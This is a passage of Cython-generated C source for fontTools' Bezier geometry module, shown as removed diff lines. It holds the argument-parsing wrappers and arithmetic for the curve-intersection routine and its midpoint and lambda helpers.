__Pyx_GOTREF(__pyx_t_5); - __Pyx_Raise(__pyx_t_5, 0, 0, 0); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __PYX_ERR(0, 1303, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_segment_at_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_s); - __Pyx_XDECREF(__pyx_v_e); - __Pyx_XDECREF(__pyx_v_midpoint); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t, "_curve_curve_intersections_t(curve1, curve2, precision=1e-3, range1=None, range2=None)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t = {"_curve_curve_intersections_t", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve1 = 0; - PyObject *__pyx_v_curve2 = 0; - PyObject *__pyx_v_precision = 0; - PyObject *__pyx_v_range1 = 0; - PyObject *__pyx_v_range2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_curve_curve_intersections_t (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve1,&__pyx_n_s_curve2,&__pyx_n_s_precision,&__pyx_n_s_range1,&__pyx_n_s_range2,0}; - values[2] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)((PyObject*)__pyx_float_1eneg_3))); - - /* "fontTools/misc/bezierTools.py":1307 - * - * def _curve_curve_intersections_t( - * curve1, curve2, precision=1e-3, range1=None, range2=None # <<<<<<<<<<<<<< - * ): - * bounds1 = _curve_bounds(curve1) - */ - values[3] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)Py_None)); - values[4] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)Py_None)); - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_curve_curve_intersections_t", 0, 2, 5, 1); __PYX_ERR(0, 1306, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_precision); - if (value) { values[2] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_range1); - if (value) { values[3] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_range2); - if (value) { values[4] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_curve_curve_intersections_t") < 0)) __PYX_ERR(0, 1306, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_curve1 = values[0]; - __pyx_v_curve2 = values[1]; - __pyx_v_precision = values[2]; - __pyx_v_range1 = values[3]; - __pyx_v_range2 = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_curve_curve_intersections_t", 0, 2, 5, __pyx_nargs); __PYX_ERR(0, 1306, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t(__pyx_self, __pyx_v_curve1, __pyx_v_curve2, __pyx_v_precision, __pyx_v_range1, __pyx_v_range2); - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint = {"midpoint", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_r = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("midpoint (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_r,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_r)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1322, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "midpoint") < 0)) __PYX_ERR(0, 1322, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_r = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("midpoint", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1322, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.midpoint", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_self, __pyx_v_r); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_r) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("midpoint", 1); - - /* "fontTools/misc/bezierTools.py":1323 - * - * def midpoint(r): - * return 0.5 * (r[0] + r[1]) # <<<<<<<<<<<<<< - * - * # If they do overlap but they're tiny, approximate - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_r, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_r, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Add(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_float_0_5, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.midpoint", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1359 - * ) - * - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) # <<<<<<<<<<<<<< - * seen = set() - * unique_values = [] - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3 = {"lambda3", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("lambda3 (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ts,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ts)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1359, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "lambda3") < 0)) __PYX_ERR(0, 1359, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_ts = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("lambda3", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1359, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.lambda3", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_lambda_funcdef_lambda3(__pyx_self, __pyx_v_ts); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_lambda_funcdef_lambda3(PyObject *__pyx_self, PyObject *__pyx_v_ts) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_cur_scope; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_outer_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("lambda3", 1); - __pyx_outer_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *) __Pyx_CyFunction_GetClosure(__pyx_self); - __pyx_cur_scope = __pyx_outer_scope; - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ts, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if (unlikely(!__pyx_cur_scope->__pyx_v_precision)) { __Pyx_RaiseClosureNameError("precision"); __PYX_ERR(0, 1359, __pyx_L1_error) } - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_cur_scope->__pyx_v_precision); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyNumber_Int(__pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ts, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (unlikely(!__pyx_cur_scope->__pyx_v_precision)) { __Pyx_RaiseClosureNameError("precision"); __PYX_ERR(0, 1359, __pyx_L1_error) } - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_cur_scope->__pyx_v_precision); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyNumber_Int(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 1359, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.lambda3", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2, PyObject *__pyx_v_precision, PyObject *__pyx_v_range1, PyObject *__pyx_v_range2) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_cur_scope; - PyObject *__pyx_v_bounds1 = NULL; - PyObject *__pyx_v_bounds2 = NULL; - PyObject *__pyx_v_intersects = NULL; - CYTHON_UNUSED PyObject *__pyx_v__ = NULL; - PyObject *__pyx_v_midpoint = 0; - PyObject *__pyx_v_c11 = NULL; - PyObject *__pyx_v_c12 = NULL; - PyObject *__pyx_v_c11_range = NULL; - PyObject *__pyx_v_c12_range = NULL; - PyObject *__pyx_v_c21 = NULL; - PyObject *__pyx_v_c22 = NULL; - PyObject *__pyx_v_c21_range = NULL; - PyObject *__pyx_v_c22_range = NULL; - PyObject *__pyx_v_found = NULL; - PyObject *__pyx_v_unique_key = NULL; - PyObject *__pyx_v_seen = NULL; - PyObject *__pyx_v_unique_values = NULL; - PyObject *__pyx_v_ts = NULL; - PyObject *__pyx_v_key = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - int __pyx_t_5; - int __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - int __pyx_t_9; - Py_ssize_t __pyx_t_10; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_curve_curve_intersections_t", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 1306, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_v_precision = __pyx_v_precision; - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_INCREF(__pyx_v_range1); - __Pyx_INCREF(__pyx_v_range2); - - /* "fontTools/misc/bezierTools.py":1309 - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - * bounds1 = _curve_bounds(curve1) # <<<<<<<<<<<<<< - * bounds2 = _curve_bounds(curve2) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_curve_bounds); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1309, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_curve1}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1309, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_v_bounds1 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1310 - * ): - * bounds1 = _curve_bounds(curve1) - * bounds2 = _curve_bounds(curve2) # <<<<<<<<<<<<<< - * - * if not range1: - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_curve_bounds); if (unlikely(!__pyx_t_2)) 